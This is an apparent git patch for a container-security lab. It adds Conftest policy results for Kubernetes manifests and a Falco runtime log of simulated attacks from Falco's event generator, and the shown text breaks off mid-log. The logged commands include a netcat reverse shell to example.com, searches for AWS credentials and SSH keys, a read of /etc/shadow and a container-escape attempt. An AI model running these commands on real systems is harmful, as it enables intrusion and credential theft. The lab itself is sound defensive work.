From 497972355589c074d383c49bdc2412ec9b8f2170 Mon Sep 17 00:00:00 2001 From: scruffyscarf Date: Mon, 27 Oct 2025 14:05:34 +0300 Subject: [PATCH] =?UTF-8?q?docs:=20add=20lab9=20=E2=80=94=20falco=20runtim?= =?UTF-8?q?e=20+=20conftest=20policies?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- labs/lab9/analysis/conftest-compose.txt | 1 + labs/lab9/analysis/conftest-hardened.txt | 1 + labs/lab9/analysis/conftest-unhardened.txt | 12 +++ labs/lab9/falco/logs/falco.log | 32 +++++++ labs/lab9/falco/rules/custom-rules.yaml | 11 +++ labs/lab9/submission9.md | 101 +++++++++++++++++++++ 6 files changed, 158 insertions(+) create mode 100644 labs/lab9/analysis/conftest-compose.txt create mode 100644 labs/lab9/analysis/conftest-hardened.txt create mode 100644 labs/lab9/analysis/conftest-unhardened.txt create mode 100644 labs/lab9/falco/logs/falco.log create mode 100644 labs/lab9/falco/rules/custom-rules.yaml create mode 100644 labs/lab9/submission9.md diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt new file mode 100644 index 00000000..d34477f0 --- /dev/null +++ b/labs/lab9/analysis/conftest-compose.txt @@ -0,0 +1 @@ +15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions \ No newline at end of file diff --git a/labs/lab9/analysis/conftest-hardened.txt b/labs/lab9/analysis/conftest-hardened.txt new file mode 100644 index 00000000..e1b772cc --- /dev/null +++ b/labs/lab9/analysis/conftest-hardened.txt @@ -0,0 +1 @@ +30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions \ No newline at end of file diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt new file mode 100644 index 00000000..8bfc3684 --- /dev/null +++ b/labs/lab9/analysis/conftest-unhardened.txt @@ -0,0 +1,12 @@ +WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe +WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true +FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag + +30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions \ No newline at end of file diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log new file mode 100644 index 00000000..9ec4a5f7 --- /dev/null +++ b/labs/lab9/falco/logs/falco.log @@ -0,0 +1,32 @@ +{"hostname":"8d5d68bba707","output":"2025-10-26T16:15:25.193767615+0000: Notice A shell was spawned in a container with an attached terminal | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=containerd-shim command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=4e8c9ece9d33 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"4e8c9ece9d33","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495325193767615,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"containerd-shim","proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2025-10-26T16:15:25.193767615Z"} +Events detected: 1 +Rule counts by severity: + NOTICE: 1 +Triggered rules by rule name: + Terminal shell in container: 1 +Events detected: 0 +Rule counts by severity: +Triggered rules by rule name: +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:05.246847774+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=4e8c9ece9d33 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"4e8c9ece9d33","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1761495485246847774,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2025-10-26T16:18:05.246847774Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:30.915703286+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link evt_type=symlinkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1761495510915703286,"evt.type":"symlinkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:30.915703286Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.144445078+0000: Notice Shell spawned by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-3512629639/httpd parent_exepath=/bin/event-generator pcmdline=httpd --loglevel info run ^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]=runc aname[5]=init aname[6]=init aname[7]= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511144445078,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":"runc","proc.aname[5]":"init","proc.aname[6]":"init","proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-3512629639/httpd","proc.pexepath":"/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2025-10-26T16:18:31.144445078Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.250304203+0000: Warning Detected AWS credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511250304203,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2025-10-26T16:18:31.250304203Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.354000619+0000: Warning Bulk data has been removed from disk | file= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/bin/busybox parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-1037392393 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511354000619,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-1037392393","proc.exepath":"/bin/busybox","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2025-10-26T16:18:31.354000619Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.573044536+0000: Notice Packet socket was created in a container | socket_info=fd=6() domain=17(AF_PACKET) type=3 proto=3 connection= lport= rport= fd_type= fd_proto= evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.args":"fd=6() domain=17(AF_PACKET) type=3 proto=3","evt.time.iso8601":1761495511573044536,"evt.type":"socket","fd.l4proto":"","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2025-10-26T16:18:31.573044536Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.692720536+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511692720536,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname id_rsa","proc.exepath":"/bin/busybox","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2025-10-26T16:18:31.692720536Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.794320161+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-3316563150/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495511794320161,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-3316563150/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2025-10-26T16:18:31.794320161Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.896295578+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=event-generator command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495511896295578,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-10-26T16:18:31.896295578Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.028092498+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow pcmdline=event-generator run syscall gparent=containerd-shim ggparent=runc gggparent=init evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/bin/event-generator parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495518028092498,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":"runc","proc.aname[4]":"init","proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:38.028092498Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.133652581+0000: Warning Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495518133652581,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 22","proc.exepath":"/usr/bin/nc","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2025-10-26T16:18:38.133652581Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.240851248+0000: Critical Detect an attempt to exploit a container escape using release_agent file | file=/release_agent cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE evt_type=openat user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c echo 'hello world' > release_agent terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495518240851248,"evt.type":"openat","fd.name":"/release_agent","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c echo 'hello world' > release_agent","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"event-generator","proc.tty":0,"thread.cap_effective":"CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Detect release_agent File Container Escapes","source":"syscall","tags":["T1611","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-10-26T16:18:38.240851248Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.439038498+0000: Critical Fileless execution via memfd_create | container_start_ts=1761495510680951565 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=3 proc_exepath=memfd:program parent=event-generator command=3 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1761495510680951565,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1761495518439038498,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"3 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"3","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-10-26T16:18:38.439038498Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.668691706+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1761495518668691706,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-10-26T16:18:38.668691706Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.669053123+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1761495518669053123,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-10-26T16:18:38.669053123Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.778881790+0000: Warning Debugfs launched started in a privileged container | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=debugfs proc_exepath=/usr/sbin/debugfs parent=event-generator command=debugfs -V terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495518778881790,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"debugfs -V","proc.exepath":"/usr/sbin/debugfs","proc.name":"debugfs","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Debugfs Launched in Privileged Container","source":"syscall","tags":["T1611","cis","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-10-26T16:18:38.778881790Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.888093665+0000: Critical Executing binary not part of base image | proc_exe=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF proc_sname=event-generator gparent=containerd-shim proc_exe_ino_ctime=1761495518884086012 proc_exe_ino_mtime=1761495518884086012 proc_exe_ino_ctime_duration_proc_start=3645153 proc_cwd=/ container_start_ts=1761495510680951565 evt_type=execve user=root user_uid=0 user_loginuid=-1 process=falco-event-gen proc_exepath=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF parent=event-generator command=falco-event-gen terminal=0 exe_flags=EXE_WRITABLE|EXE_UPPER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1761495510680951565,"evt.arg.flags":"EXE_WRITABLE|EXE_UPPER_LAYER","evt.time.iso8601":1761495518888093665,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"falco-event-gen","proc.cwd":"/","proc.exe":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF","proc.exe_ino.ctime":1761495518884086012,"proc.exe_ino.ctime_duration_proc_start":3645153,"proc.exe_ino.mtime":1761495518884086012,"proc.exepath":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF","proc.name":"falco-event-gen","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Drop and execute new binary in container","source":"syscall","tags":["PCI_DSS_11.5.1","TA0003","container","maturity_stable","mitre_persistence","process"],"time":"2025-10-26T16:18:38.888093665Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.327861706+0000: Notice Disallowed SSH Connection | connection=172.17.0.5:47644->23.215.0.136:443 lport=443 rport=47644 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495519327861706,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.5:47644->23.215.0.136:443","fd.rport":47644,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard 